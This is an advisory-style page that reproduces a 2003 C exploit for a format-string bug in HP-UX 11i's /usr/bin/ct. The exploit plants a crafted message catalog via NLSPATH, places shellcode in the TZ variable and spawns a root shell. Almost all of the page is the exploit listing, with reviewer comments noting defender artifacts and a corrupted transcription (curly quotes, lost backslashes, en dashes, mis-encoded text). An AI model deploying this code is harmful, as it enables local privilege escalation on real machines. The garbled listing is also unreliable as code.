HP-UX libc NLSPATH Environment Variable Privilege Elevation (Exploit)

Summary

As we reported in our previous article, HP-UX libc NLSPATH Environment Variable Privilege Elevation Vulnerability, a locally exploitable buffer overflow in the program allows local users to gain elevated privileges. The following exploit code can be used to test your system for the mentioned vulnerability.

Credit:

The information has been provided by watercloud.


Details

Exploit:
/***********************************************************************
* File : x_hp-ux11i_nls_ct.c
* Usage : cc x_hp-ux11i_nls_ct.c -o x_ct ; ./x_ct
* Purpose :
* HP-UX??????????????/usr/bin/ct?????????????????root???
* Get a local rootshell from /usr/bin/ct,using HP-UX location language format string bug.
* Author : watercloud@xfocus.org
* Date : 2003-1-4
* Tested : On HP-UX B11.11 .
* Note : Use at your own risk!
* Site : http://www.xfocus.org (EN)
* http://www.xfocus.net (CN)
***********************************************************************/

#include<stdio.h>

/* Environment variables installed with putenv() in main(). NLSPATH is pointed
   at a catalog under /tmp -- the NLSPATH handling the advisory is about, and a
   useful detection signal (NLSPATH resolving outside the system catalog dirs).
   NOTE(review): this copy of the listing uses curly quotes (‘ ’) and has lost
   the backslashes of its escape sequences, so it does not compile as shown. */
#define PATH ‘PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin’
#define TERM ‘TERM=xterm’
#define NLSPATH ‘NLSPATH=/tmp/.ex.cat’

/* Command line ct is started with, and the first line written to the catalog
   source file (presumably "$set 1" newline "1128 " before the backslash was
   lost in transcription -- confirm). */
#define CMD ‘/usr/bin/ct abc_ ‘
#define MSG ‘$set 1n1128 ‘
/* Target-specific layout constants consumed by the arithmetic in main(). */
#define PRT_ARG_NUM 2
#define STACK_LEN 0x180

#define ENV_BEGIN 0x40
#define ENV_LEN 0x40
#define LOW_STACK 0x210

char buffer[512];   /* receives the TZ=... string that main() builds and putenv()s */
/* Payload bytes carried in the TZ variable; the trailing "/bin/shA" is readable.
   Three words starting at offset 56 are overwritten by main() through pint. */
char buff[72]=
  ‘x0bx5ax02x9ax34x16x03xe8x20x20x08x01xe4x20xe0x08’
  ‘x96xd6x04x16xebx5fx1fxfdx0bx39x02x99xb7x5ax40x22’
  ‘x0fx40x12x0ex20x20x08x01xe4x20xe0x08xb4x16x70x16’
  ‘/bin/shA’;
int * pint = (int *) &buff[56];   /* write cursor into buff, 56 bytes in */
unsigned int haddr = 0;           /* high 16 bits of a stack address; set in main() */
unsigned int dstaddr = 0;         /* address patched into buff; set in main() */

/*
 * Entry point. Builds a message catalog and a crafted environment, then
 * replaces this process with /usr/bin/ct.
 *
 * Defender notes, all taken from the code below: the observable artifacts
 * are the catalog source /tmp/.ex.k (written, handed to /usr/bin/gencat via
 * system(), then unlinked), the resulting catalog /tmp/.ex.cat (deliberately
 * left behind, see the final printf), an NLSPATH value pointing into /tmp,
 * a TZ variable carrying the bytes of buff, and the process chain
 * x_ct -> sh -c "/usr/bin/gencat ..." -> ct. argc and argv are unused; env
 * is the non-standard third main() parameter holding the environment.
 */
int main(argc,argv,env)
int argc;char ** argv;char **env;
{
    unsigned int * pa = (unsigned int*)env;   /* walks the environment pointer array */
    FILE * fp = NULL;
    /* Width arithmetic from the target-specific constants at the top of the
       file. NOTE(review): the '–' on this and two later lines is an en dash,
       a transcription artifact for '-'. */
    int xnum = (LOW_STACK – ENV_BEGIN + STACK_LEN -56 -12 -36 -PRT_ARG_NUM*4)/4;

    int alig1= ENV_BEGIN – xnum*8;
    int alig2=0;
    int i=0;

    /* Zero each environment pointer up to the terminating NULL, presumably so
       that only the variables putenv() installs below reach the child. */
    while(*pa != NULL)
        *pa++=0;
    
    /* CMD has to fit in the space reserved ahead of buff in the TZ string. */
    if(strlen(CMD) >ENV_BEGIN-3)
    {
        printf(‘No enough space to alig our env!n’);
        exit(1);
    }

printf(‘Exploite for HP-UX 11i NLS format bug by command ct.n’);
printf(‘From watercloud@xfocus.org. 2003-1-4n’);
printf(‘ Site : http://www.xfocus.net (CN).n’);
printf(‘ Site : http://www.xfocus.org (EN).n’);

    /* High 16 bits of the address of a local of this process. */
    haddr = (unsigned int)&fp & 0xffff0000;
    /* Normalize both width values into the range 0..0xffff. */
    if(alig1 < 0)
      alig1+=0x10000;
    alig2 = (haddr >> 16) – alig1 -xnum*8 ;
    if(alig2 < 0)
      alig2+=0x10000;

    /* Patch the address into buff at offset 56 through pint: three copies,
       then a zero word. */
    dstaddr= haddr+ LOW_STACK + STACK_LEN -24;
    *pint++=dstaddr;
    *pint++=dstaddr;
    *pint++=dstaddr;
    *pint = 0;
    
    /* begin to make our .cat file */
    /* Catalog source: MSG, xnum copies of "%.8x", then two directives whose
       widths are alig1 and alig2. The message text consisting of printf
       directives is the format-string defect named in the header comment.
       Artifact on disk: /tmp/.ex.k. */
    fp = fopen(‘/tmp/.ex.k’,’w’);
    if(fp == NULL)
    {
      printf(‘open file : /tmp/.ex.k for write error.n’);
      exit(1);
    }
    fprintf(fp,’%s’,MSG);
    for(;i<xnum;i++)
      fprintf(fp,’%%.8x’);
    fprintf(fp,’%%.%ix%%n’,alig1);
    fprintf(fp,’%%.%ix%%hn’,alig2);
    fclose(fp);
    fp = NULL;
    /* Compile the source into the catalog that NLSPATH names, via system()
       (so a shell is spawned as well), then remove the source. The compiled
       catalog /tmp/.ex.cat stays on disk. */
    system(‘/usr/bin/gencat /tmp/.ex.cat /tmp/.ex.k’);
    unlink(‘/tmp/.ex.k’);

    /* TZ holds buff between two space-padded %*s fields whose widths derive
       from ENV_BEGIN/ENV_LEN; then the fixed PATH, TERM and NLSPATH. */
    sprintf(buffer,’TZ=%*s%s%*s’,ENV_BEGIN-3-strlen(CMD),’A’,buff,ENV_BEGIN+ENV_LEN-strlen(buff),’B’);
    putenv(buffer);
    putenv(PATH);
    putenv(TERM);
    putenv(NLSPATH);
    
    printf(‘??????????(Remember to delete the file): /tmp/.ex.cat .n’);
    /* Replaces the process image with ct; execl() returns only on failure,
       which is not checked. NOTE(review): the original trailing comment is
       mis-encoded in this copy of the listing. */
    execl(‘/usr/bin/ct’,’/usr/bin/ct’,’abc_’,0); /* ????? ?? */
} ‘

Categories: Exploits